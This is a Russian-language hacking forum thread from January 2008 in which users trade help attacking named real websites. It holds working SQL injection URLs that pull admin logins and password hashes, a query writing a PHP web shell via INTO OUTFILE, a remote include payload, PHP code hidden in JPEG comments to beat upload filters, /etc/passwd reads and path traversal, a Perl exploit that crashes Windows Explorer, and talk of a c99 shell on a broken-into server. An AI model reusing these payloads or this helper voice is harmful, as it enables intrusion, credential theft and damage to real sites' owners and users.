Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /opt/site/trunk/htdocs/tv_channels.php on line 89

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /opt/site/trunk/htdocs/tv_channels.php on line 102

n0ne
03.01.2008, 09:46
Taylorith, и?

Taylorith
03.01.2008, 09:48
ничего )) помоему это мне ниче не дает

n0ne
03.01.2008, 09:50
Taylorith, http://forum.antichat.ru/thread19605.html

Taylorith
03.01.2008, 09:51
я это уже десять раз читал , забей уже я сам понял что на том сайте хоть и есть ошибки в запросах , но поиметь от них ни фига нельзя((((( оч жаль((

n0ne
03.01.2008, 09:53
Taylorith, скинь сайт в пм

Taylorith
03.01.2008, 10:00
скниул если че)

AFoST
03.01.2008, 14:31
Есть стата для кс "PsychoStats v3.0.6b". Есть сплойт

http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00

Запаганить статистику получается :) А вот как из этого извлеч хоть какую-нибудь пользу?

blackybr
03.01.2008, 18:47
я посмотрел чтоэто за "сплоит", на багртаках написано - information disclosure)) как ты "запоганил статистику" ?

AFoST
03.01.2008, 23:30
Да подставляю "server.php?newcss=styles.css&newtheme=%00" и все ппц =) Одни ошибки при заходе на стату %)

Piflit
04.01.2008, 01:31
psychostats
2007-10-26
Version: 3.0.7b
Small security update (All users should use this over the previous version 3.0.6).
в этой версии уязвимости уже нет?

AFoST http://securityvulns.ru/Rdocument77.html

Scipio
04.01.2008, 01:38
Не хочу оффтоп разводить, но в психостате так много уязвимостей, что тема не стоит обсуждения, просто те кто сможет этими уязвимостями воспользоваться те и и баге смогут найти, а те кто уязвимостями в психостате воспользоваться не смогут, тому они как бы и ненужны, я там видел кучу скулей после ордер бай, но для этого надо уметь пользовать скуль инъекции

AFoST
04.01.2008, 01:41
Piflit, по ссылке только про xss написано...
Кстати если подставить в "server.php?newcss=styles.css&newtheme=%00" перед %00 любой символ и перейти по адресу, то ошибки не вылетают =\

Piflit
04.01.2008, 01:44
Не хочу оффтоп разводить, но в психостате так много уязвимостей, что тема не стоит обсуждения, просто те кто сможет этими уязвимостями воспользоваться те и и баге смогут найти, а те кто уязвимостями в психостате воспользоваться не смогут, тому они как бы и ненужны, я там видел кучу скулей после ордер бай, но для этого надо уметь пользовать скуль инъекции
можно поподробнее. у меня на сайте эта стата стоит. или в личку...

AFoST
04.01.2008, 02:22
Покапался нашел скул после order by
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот.
Да, там точно скул есть.
ssort=(-skill*(1=1))--
обрезание запроса

Noiro
04.01.2008, 02:29
Счас покапался, типа это наверное скул после ордер бай
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот...
Если поддерживаются подзапросы, пробуй сделать слепую иньекцию.

Scipio
04.01.2008, 02:33
угу, плюсенг, но их там полно

sedoy_xxx
04.01.2008, 15:06
Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации

Ch3ck
04.01.2008, 15:27
Про расширения тут глянь:
https://forum.antichat.ru/threadnav23501-1-10.html
дописать php код в какие-то теги
_)))))) В <?php ?> наверно ;) Открываешь картинку редактором(по вкусу) и дописываешь в конец...

AFoST
04.01.2008, 15:51
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.

.Begemot.
04.01.2008, 15:56
Подобрал -
http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/*

Хочу залить шел -
http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/*
Не получается!

1) В заппосе что то не так или прав на зипись нету?
2) В слепой инжекции можно шел залить?

AFoST
04.01.2008, 16:06
Всё правильно написано, чтолько вот 0.015 это числа или строка? Чкорее всего нет прав. Ещё перепроверь путь к записываемому файлу.

Ch3ck
04.01.2008, 16:07
Cначала в bin2hex попробуй перевести...

Spyder
04.01.2008, 16:13
1 - или прав на запись нет у пользоватлея от кторого работает мускул или папки недоступны на запись) или и то и другое
2 - можно. Разницы то никакой нет

Spyder
04.01.2008, 16:17
лол
http://www.rusfishing.ru/?M=-1+union+select+0x687474703a2f2f7a69726f6461792e6e6 1726f642e72752f616e746963686174/*&id=0&id_=-0.015
в другом параметре запрос с 1 столбцом
из него выводится имя страницы и подстовляется в функцию include() на конце добовляется .php
0x687474703a2f2f7a69726f6461792e6e61726f642e72752f 616e746963686174
это переведённое в хекс http://ziroday.narod.ru/antichat
вот и всё =)
ЗЫ В папку forum есть запись

Ch3ck
04.01.2008, 16:33
Спудер опередил...
ОФФТОП:
В странице индекс.пхп :

if ($_SERVER[REMOTE_ADDR] == '194.190.205.10' or $_SERVER[REMOTE_ADDR] == '194.87.41.11'){echo("
// <SCRIPT type='text/javascript'>
// alert('Опять ты Stan-Hunfi. Если не прекратишь, будем сыпать пургу к тебе на форум! Совет Клуба постановил, тебе сюда МУДИЛА!!!.');
// window.location='http://www.pornushka.ru';
// </SCRIPT>
// ");}



Вот это рыбаки!!! :))))))))))))
P.S ничего не дефейсить. Убью.

Piflit
04.01.2008, 20:18
запрос
concat(table_schema,0x2e,table_name)+from+informat ion_schema.tables
выдает
pure-ftpd.users
как теперь вывести содержимое этой таблицы users из бд pure-ftpd? (мешает '-' ), т.к. таблица users уже есть в другой бд и запрос from+users выдает другую инфу.

Ky3bMu4
04.01.2008, 21:42
Мож вот так:)?

base_decode(cHVyZS1mdHBkLnVzZXJz)

Ну ешё можно через aec decrypt\encrypt.

Spyder
05.01.2008, 00:06
select omfg from pure-ftpd.users
в чём проблема?
Кузьмич, не говори х**ни

Piflit
05.01.2008, 00:15
select omfg from pure-ftpd.users
в чём проблема?
Кузьмич, не говори х**ни
+from+pure-ftpd.users/*
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-ftpd.users/*' at line 1

.Slip
05.01.2008, 00:16
mysql hex?

Spyder
05.01.2008, 00:25
Слип, ты сначало сам попробуй где нить имя таблицы в хекс первести и потом данные извлечь, ога? Друк Кузьмича что ли?

.Slip
05.01.2008, 00:32
Блядь ты знак "?" видишь или нет? Мб мне надо скрин своего поста для тебя сделать=\

select omfg from pure-ftpd.users
в чём проблема?
Ты сам то походу не далеко ушёл=\

А®ТеS
05.01.2008, 04:08
Наковырял инж на сайте http://www.ecoaction.com.au/, подобрал таблицы, поля, есть акк админа:
http://www.ecoaction.com.au/content.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(username,';',password),0x71),0x71),5,6,7,8,9,10, 11+FROM+users/*
Вопрос значит такой: а где админка?))).

Piflit
05.01.2008, 04:17
А®ТеS
http://www.ecoaction.com.au/esa

Noiro
05.01.2008, 06:06
+from+pure-ftpd.users/*
Попробуй `pure-ftpd`.`users`
'`' обычно никто не экранирует, должно сработать

Spyder
05.01.2008, 14:43
вы синтаксиса sql походу вообще не знаете
в запросе после from таблицу надо указывать без ковычек, так как она есть
т е select * from omfg
а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11)
и уж самый пиздец вот это
http://forum.antichat.ru/showpost.php?p=547344&postcount=632

Scipio
05.01.2008, 14:49
вы синтаксиса sql походу вообще не знаете
в запросе после from таблицу надо указывать без ковычек, так как она есть
т е select * from omfg
а не select * from 'omfg', ... `omfg`, ... 0xblablabla, ... char(11,11,11,11,11,11)
и уж самый пиздец вот это
http://forum.antichat.ru/showpost.php?p=547344&postcount=632

если ты про Noiro, то он абсолютно все правильно сказал имена таблиц поидее должны обрамляться в апострофы (обратные кавычки) именно в таких случаях это критично

остальные посты улыбнули

Spyder
05.01.2008, 15:15
ога, только вот ошибочку то выдаёт
Error: Incorrect table name 'pure-ftpd.users'
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)

Scipio
05.01.2008, 16:35
ога, только вот ошибочку то выдаёт
Error: Incorrect table name 'pure-ftpd.users'
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)

так надо обратныйе кавычки урл код которых %60 т.е. запрос будет:

http://site.dmn/script.php?id=1 union select 1 from %60pure-ftpd%60.users/*

и соответственно имя бд отдельно в обратные кавычки брать от .users

Ded MustD!e
05.01.2008, 16:49
впишусь пожалуй в вашу тему, причем тут кавычки, если в посте с вопросом ясно написано, что мешает "-" в "pure-ftpd.users"? и еще, ссылку кидали на сайт, или мы вслепую помогаем?

Scipio
05.01.2008, 16:58
2Ded MustD!e, да не стоит вписываться, все уже давно решено, я общался с Piflit`ом по осеку и все прокатило, объясняю как я сам это все понимаю, pure-ftpd здесь воспринимается как выражение а не название таблицы т.е. есть оператор минус, поэтому ошибка и выдается, если ты пишешь `pure-ftpd`.users , то одназначно указываешь мускулу, что pure-ftpd - это имя БД а не операция

ElteRUS
05.01.2008, 18:03
Ну вот вам пример )

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+ita-forum.itaf_user/*

при таком запросе будет ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3

А если так

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+%60ita-forum%60.itaf_user/*

мы увидим хеш

Так что Scipio абсолютно прав

Tigger
06.01.2008, 02:47
http://kronverkcinema.ru/repertoire'/*
Пишет, что MySQL
Но мне сказали, что комментарий обрубается...скажи те как быть...или какие другие способы взлома))

Noiro
06.01.2008, 11:25
вы синтаксиса sql походу вообще не знаете
Дело в том что надо указывать только имя таблицы, без имени бд в которой она находится +)
Base tables and views are identified by <table name>s. A <table
name> consists of a <schema name> and an <identifier>. For a per-
sistent table, the <schema name> identifies the schema in which
the base table or view identified by the <table name> was de-
fined. Base tables and views defined in different schemas can
have <identifier>s that are equal according to the General Rules
of Subclause 8.2, "<comparison predicate>".

If a reference to a <table name> does not explicitly contain a
<schema name>, then a specific <schema name> is implied. The par-
ticular <schema name> associated with such a <table name> depends
on the context in which the <table name> appears and is governed
by the rules for <qualified name>. The default schema for <prepara-
ble statement>s that are dynamically prepared in the current SQL-
session through the execution of <prepare statement>s and <execute
immediate statement>s is initially implementation-defined but may
be changed by the use of <set schema statement>s.

:rolleyes:

Masyoka
06.01.2008, 12:08
Хеллоу всем =D

Вопрос такой:
сканил один сайт и он нашел такую уязвимость

Подозрение на серьезную уязвимость
Множественные уязвимости (OpenSSL)
Описание

Краткое описание
Уязвимости позволяют удаленному атакующему выполнить произвольный код в системе или вызвать отказ в обслуживании приложения.
Подробное описание
1. Уязвимость существует из-за ошибки при обработке некорректных ASN.1 структур. Удаленный атакующий с помощью специального запроса может вызвать отказ в обслуживании приложения. Уязвимости подвержены все приложения использующие библиотеку OpenSSL для обработки ASN.1 данных.
Выпуски OpenSSL до версии 0.9.7 не содержат данную уязвимость.
2. Обработка публичных ключей определенного типа требует большого количества процессорного времени. Злоумышленник с помощью серии специальных запросов может вызвать отказ в обслуживании приложения.
3. Уязвимость переполнения буфера в функции "SSL_get_shared_ciphers()". Злоумышленник может отослать уязвимому приложению SSL запрос содержащий специальным образом сформированный список шифров, при обработке которых функцией "SSL_get_shared_ciphers()" произойдет переполнение буфера. Данная уязвимость при определенных обстоятельствах может быть использована атакующим для выполнения произвольного кода в системе.
4. Уязвимость существует в клиентских процедурах отвечающих за обработку SSLv2. Данная уязвимость может быть использована только для проведения DoS-атак направленных на клиентские приложения использующие уязвимую библиотеку OpenSSL.
Потенциально уязвимостям подвержены все приложения использующие уязвимую библиотеку OpenSSL.
Уязвимые версии
OpenSSL версии 0.9.7k и предыдущие
OpenSSL версии 0.9.8c и предыдущие
Использование уязвимости
Использование уязвимости удаленно: да
Использование уязвимости локально: да
Базовая оценка по системе CVSS
CVSS Base Score: 8
(AV:R/AC:L/Au:NR/C:P/I:P/A:C/B:N)
Ложные срабатывания (False Positives)
Вывод о наличии уязвимости сделан на основе версии по результатам идентификации сервисов и приложений на сканируемом узле. Если при установке обновления номер версии не менялся, возможно ложное обнаружение уязвимости.
Пропуск уязвимости (False Negatives)
Случаев пропуска уязвимости зарегистрировано не было. Причины возможных пропусков неизвестны.

и еще

Подозрение на уязвимость
DoS-атака (OpenSSL)
Описание

Обнаружено несколько уязвимостей в OpenSSL.
1. Обнаружена уязвимость нулевого указателя в функции do_change_cipher_spec(). Удаленный атакующий может послать серверу специально сформированное SSL/TLS рукопожатие (handshake), что заставит OpenSSL аварийно завершить работу.
2. Уязвимость обнаружена в SSL/TLS handshakes при включенном Kerberos шифровании. Удаленный атакующий может аварийно завершить работу службы.
3. OpenSSL некорректно обрабатывает неизвестные типы сообщений. Удаленный атакующий может специальным образом вызвать отказ в обслуживании.
Уязвимые версии:
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
OpenSSL Project OpenSSL 0.9.7

можно ли чем либо грохнуть попробывать?
Посовтеуйте, что вы об этом думаете.

Ky3bMu4
06.01.2008, 15:02
/* можно заменить на %2f%2a , но в данном случае это вроде ничего не даёт.

Dr.Z3r0
06.01.2008, 15:16
/* можно заменить на %2f%2a , но в данном случае это вроде ничего не даёт.
ну ты извращенец... не знаю что ты хочешь сделать но гг вообще то есть пара других способов начать комментарий...
К примеру два тире подряд --

Ky3bMu4
06.01.2008, 16:05
К примеру два тире подряд --

Ты уверен, что для mysql сервера прокатит? Мой пост был адресован сюда (https://forum.antichat.ru/showpost.php?p=549357&postcount=648).

Dr.Z3r0
06.01.2008, 16:57
Ты уверен, что для mysql сервера прокатит? Мой пост был адресован сюда (https://forum.antichat.ru/showpost.php?p=549357&postcount=648).
Уверен

.Begemot.
07.01.2008, 15:35
Для меня остается не понятной одна весЧь.

http://www.mxftk.com/pub/page.php?id=-47

id=-47 - показывает главную страницу

id=47+order+by+10000/* - страницу отображает правильно.

Внимание! Впрос:) Можно ли както подобрать количество столбцов?

ice1k
07.01.2008, 15:37
trumps, там нет инъекции.

.Begemot.
07.01.2008, 15:38
trumps, там нет инъекции.
Понятно :( . Спасибо.

Grimcho
07.01.2008, 23:27
Возник вопрос ...

У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?

.Slip
07.01.2008, 23:30
Возник вопрос ...

У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
Смотря что в них кроме сессии есть.

.Begemot.
07.01.2008, 23:30
Возник вопрос ...

У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
Что-нибудь, сделать можно). Это зависит от того кто дал тебе куки(какой двиг,форум).

Grimcho
08.01.2008, 00:06
Значит содержание cookies может быть различным в зависимости от форума? Если можно чуток по подробнее об этом.

AFoST
08.01.2008, 00:23
Куки сдержат временную информацию, которую оставляет у тебя на компе форум/сайт/вообще скрипт. Это может быть:
пароль
логин
сессия
счетчик посещений
и всё что угодно остальное :)

Grimcho
08.01.2008, 00:25
С каким софтом происходит извлечение? (Cookie Editor?? )

Tigger
08.01.2008, 00:56
http://www.redakteur-cup.de/_error.php?error=You+have+an+error+in+your+SQL+syn tax%3B+check+the+manual+that+corresponds+to+your+M ySQL+server+version+for+the+right+syntax+to+use+ne ar+%2778.37.211.6%27+LIMIT+1%27+at+line+1%3Cbr+%2F %3E%3Cbr+%2F%3E%27UPDATE+mdl_counter_ip+SET+ip_las t_action+%3D+%271199739254%27%2C+ip_last_page+%3D+ %27news.php%3Fn%3D22%27%27%2C+ip_user_id+%3D+%27%2 7+WHERE+ip_ip+%3D+%2778.37.211.6%27+LIMIT+1%27&redirect=news.php
Что с этим делать?

AFoST
08.01.2008, 01:25
С каким софтом происходит извлечение? (Cookie Editor?? )
Что за извлечение??? Откуда куда?
В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).

Piflit
08.01.2008, 01:26
Что за извлечение??? Откуда куда?
В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).
в осле нет

NilsonUA
08.01.2008, 12:17
Вобщем проблема с раскрытием скули в логине
есть сайт http/site/login.php
Поля мыло и пасс. Реагируют на кавычку обычную в логине, но как дальше быть? Пишет про некорректный запрос и все!

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 0x78617861'' at line 1

select osc_email_addr from osc_activation where osc_activation=0 and osc_email_addr=''select 0x78617861'

[TEP STOP]

хэлп плз

Scipio
08.01.2008, 15:01
введи:
'/**/union/**/select/**/'xaxa

а лучше:
'/**/union/**/select/**/1/*

NilsonUA
08.01.2008, 18:02
введи:
'/**/union/**/select/**/'xaxa

а лучше:
'/**/union/**/select/**/1/*


донт ворк, пишет просто неверный логин.

папка /includes/ открыта для просмотра...

есть имена всех таблиц, больше принципе нечего не накпал.

Те кто хочет быть помочь стукайте а асику, все что поимеем поделим(это гейм шоп)

Welemir
10.01.2008, 01:23
Всем превед,нашёл тот сайтег прикольный гг))

При скане нашёл такую бадягу- XSS через HTTP:P.

По дефолтовскому коду дали пример:

GET /SITE HTTP/1.1
Host: ivbgj<xscript>XSS</xscript>.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

P.S.:

SITE- хост разумееца : )

Переделал и отправил:

GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

Серв либо отвечает,либо,если чё переделать слегка, выходит,что вообще молчание:Р

Расскажите, что я сделал(или нахимичил хз),а всё никаг.В подробности уязвимости был дан дефолтовский код.

P.S. Юзил перехватичик+отправщег пакетофф с сайта)(( (Хотя... в HTTP йа нупище,стараюсь=___=).

AFoST
10.01.2008, 01:25
Host: <указать хост> =)

blackybr
10.01.2008, 01:28
GET /index.html HTTP/1.1
Host: SITE<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

ты отправляешь в никуда

AFoST
10.01.2008, 01:47
Он отправляет на сайт SITE<xscript>alert('XSS');</xscript>.ru и запрашивает index.html =\

timlame
10.01.2008, 14:02
Помогите чем можете.
Есть сайт, на нем скуль инъекция.
site.ru/news.php?id=-1+union+select+1,2,333,444,5,6,7,8,9,10/*

выводятся столбцы 3 и 4

делаю так site.ru/news.php?id=-1+union+select+1,2,load_file('some_file'),444,5,6, 7,8,9,10/* - вылетает ошибка
делаю site.ru/news.php?id=-1+union+select+1,2,load_file(char(тут числа)),444,5,6,7,8,9,10/* - пустота, т.е. никаких ошибок не вылетает, просто вместо столбца 3 пустота ( в чем гемор ??
доступа к information_schema нет
на сайте нет форумов, нашел админку site.ru/admin/ , там доступ закрыт через .htacces

что посоветуете господа ?

big_BRAT
10.01.2008, 14:30
это нормально, у пользователя mysql нет прав на чтение файлов. А ошибку выкидывает потомы что фильтруется кавычка.
что делать - подбирать таблицу с пользователями и надеятся что пароли подойдут к админке, а лучше ссылку на сайт

Scipio
10.01.2008, 14:40
ну это совсем не фактload_file(char(тут числа))смотря каие там "тут числа", мож файла такого просто не существует, timlame, попробуй:
site.ru/news.php?id=-1+union+select+1,2,load_file(0x2F6574632F706173737 764),444,5,6,7,8,9,10/*

если не увидишь ничего, то или ось винда или файловых привилегий нет скорее второе

timlame
10.01.2008, 16:08
т.е. в случае отсутствия файла load_file() возвращает пустую строчку ?

Scipio
10.01.2008, 16:13
и в случае отсутствия файла и в случае если нет файловых привилегий
ошибка возникает тогда, когда ты в load_file() (при наличии file_priv) передал только имя не существующей директории

Welemir
10.01.2008, 16:48
вместо сайт пусь буит www.debilko.ru

знач,как я понял,должно быть так:

GET /index.html HTTP/1.1
Host: debilko<xscript>alert('XSS');</xscript>.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive

йа пробывал и гет и пост. Вообще скажите, код то можно внедрить ?)

AFoST
10.01.2008, 17:19
GET /index.html HTTP/1.1
Host: debilko.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Connection: Keep-Alive


так должно быть. А ты вообще что хочешь сделать? Почитай про синтаксис http 1.0. Думаю, поймешь, че за чушь написал.

Welemir
10.01.2008, 17:31
я хотел через HTTP внедрить на хтмл сайт XSS :P

Я знаю шо твой запрос пральный,ток xspider написал какуюто Г.мол бага есь и запрос)

Welemir
10.01.2008, 17:36
И ещё вопрос. пробывал тут sql- запросы на qwerty.ru

http://qwerty.ru/news.php?id=9999997999+select+union+null,null

Если он выдаёт при таком запросе список всех тем,и при ID=1+1; 2+1 не реагирует- баги нету?

P.S. на запрос or 1=1 выдаёт список всех тем,найденных на серве(без кавычек).С кавычками ашиппко... Рассудите меня :Р

AFoST
10.01.2008, 17:56
я хотел через HTTP внедрить на хтмл сайт XSS :P

Я знаю шо твой запрос пральный,ток xspider написал какуюто Г.мол бага есь и запрос)
Какую-то хрень твой спайдер написал =) Чтобы внедрить js-код, надо в параметрах, которые используются скриптом передать в качестве значения js-код. host не является таким параметром. Им может являться refferer или user-agent или другие параметры, кот. используются непосредственно в скрипте.

А®ТеS
10.01.2008, 17:58
Welemir, нету там инъекции...

Welemir
10.01.2008, 18:47
жалось то какая)) пасиб шоп помогли.буду искать на досуге уязвимые страницы для тестоф)

Welemir
10.01.2008, 22:49
http://www.dukemednews.org/news/article.php?id=10059+union+select+1,2,3,4,5,6,7,8, 9,10,11,12/*

Народ,объясните кто-нибудь,как подобрать здесь количество столбцов и строк(как было написано).Подбирал строки- пишет ошибки какие-то.Подбирал ещё запросом -10059+order+by+10000,куча ошибок. Чем меньше число после by,тем меньше ошибок,но толку нет.(какое макс количество полей может быть я хз)).

Welemir
10.01.2008, 22:53
Упс...строки подобрал:Р

beng217
11.01.2008, 11:34
Вазможно ли как либо пробиться., у нас на провайдаре есть внутринный ресурс all.gs.uz
там выставляют разные новасти из за канфликта по однаму вапросу с админом сайта, на вход в этот сайт по локальной сети меня заблакировали до 23 января и типерь когда я пытаюсь зайти по локальной сети пишет что нельзя зяйти

big_BRAT
11.01.2008, 12:17
Смотря по чём тебя забанили
1. Логин
2. IP and/or MAC
Первое решается ну очень просто, хотя я думаю что тебя банили по второму, так как ты в локалке то я думаю есть вариант со сменой ИП, если такой возможности нет но оч. хочется, то как вариант можешь договорится с другом и поставить у него прокси, и ходить через него.
пс: если друг вдруг станит не_друг, то заодно сможешь за его счет ходить в инет)))

Welemir
11.01.2008, 23:00
Fatal error: main(): Failed opening required 'articles/000117 union select null,null/*/text.htm' (include_path='.:/usr/local/share/pear')

Кто-нить знает,чё за ошибка такая? бадяга то точно есь: ))(чето пропуть пишет)

V1k
11.01.2008, 23:06
это инклуд или читалка файлов.
попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
и почитай статьи на эту тему

Welemir
12.01.2008, 03:28
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*

P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
__________________________________________________ _______________________

http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*

Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )

BlackCats
12.01.2008, 03:36
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*

P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
невоткнул где вывод, но есть схема таблес:
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+information _schema.tables/*
http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*

Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
надо просто было подставить нге существующий id.
вот: 4твёртая версия, дальше уж подбирай.
http://www.happyland-drink.ru/brands.php?id=-2+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,%2027, 28/*

Basurman
12.01.2008, 03:42
http://www.paintball.ru/next.php?id=19+or+1=1

там где чувак с ружом

Welemir
12.01.2008, 03:43
это инклуд или читалка файлов.
попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
и почитай статьи на эту тему

Можешь ссылку дать,а то я чет не нахожу)(наверн потому,что спать хчу :o )

STUDENTIK
12.01.2008, 13:22
Сильно не пинайте знатоки, лучше подскажите и научите нашел вот такое
Такой себе простенький сплоет убивающий explorer.exe.. локальный. Компилится под перлом. После компиляции создается файл *.wmf в директории. При просмотре директории с этим файлом ехплорер зависает...
Вот код:
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x 61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x 00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x 00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

# milw0rm.com

научите как правильно его запустить и можно ли сделать чтоб он сам запускался?

guest3297
12.01.2008, 14:10
юзай мета сплойт.
выбирай шелкод, генерируй сплойт и работай в разделе статьи есть на эту тему.

Lesnoy_chelovek
12.01.2008, 14:23
STUDENTIK
Для начала поставь сеье Perl. Потом просо в командной строке пиши perl путь_до_скрипта
А вообще поставб себе локальный сервер, типа Denwer - пригодится.

fervex
12.01.2008, 21:34
Здравствуйте! :)

Подскажите, как обойти фильтрацию двойных точек в относительном пути:

есть php-код (upload.php редактора fckeditor):

$sCurrentFolder = $_GET['CurrentFolder'] ;
if ( strpos( $sCurrentFolder, '..' ) ) SendError( 102, "" ) ;

где CurrentFolder хочу поставить '../../../' вместо '/'

Спасибо! :)

Macro
12.01.2008, 21:39
Никак

beng217
13.01.2008, 11:24
Смотря по чём тебя забанили
1. Логин
2. IP and/or MAC
Первое решается ну очень просто, хотя я думаю что тебя банили по второму, так как ты в локалке то я думаю есть вариант со сменой ИП, если такой возможности нет но оч. хочется, то как вариант можешь договорится с другом и поставить у него прокси, и ходить через него.
пс: если друг вдруг станит не_друг, то заодно сможешь за его счет ходить в инет)))


Прошу прощения что так долго не писал политела Winda, пришлось переустонавливать

а как можно понять почему меня забанили., попробовал подключится по другому кампу из локалки тоже не получилось и выводится во это сообщения

Ваш аккаунт на сайте заблокирован:

Ваша учетная запись на сайте была заблокирована администратором. При этом были указаны следующие причины:

Ваш IP адрес или подсеть были заблокированы администратором

За не корректное поведение на портале

Срок окончания блокировки: 21 янв 2008 14:30

Это полностью автоматический процесс блокировки и от вас не требуется ничего делать для его ускорения или прекращения.

Macro
13.01.2008, 11:46
Не в тот раздел...
Если забанен по ip, то заходи через прокси или анонимайзер.

guest3297
13.01.2008, 12:01
Macro
Они не банят по ip.

beng217
Обратись в службу поддержки вм предварительно прочитав договор.

fervex
13.01.2008, 12:36
Залил с99madshell на сервер. Linux, Apache2.

Там есть папка, в которой access denied, если через командную строку броузера запускать php файлы, а через шелл я в ту папку зайти могу.

Скажите, как можно, используя шелл, сделать возможность исполнять эти файлы из той папки в броузере?

И ещё вопрос: как поменять через c99madshell время последнего изменения файла?

Спасибо! :)

.Slip
13.01.2008, 12:43
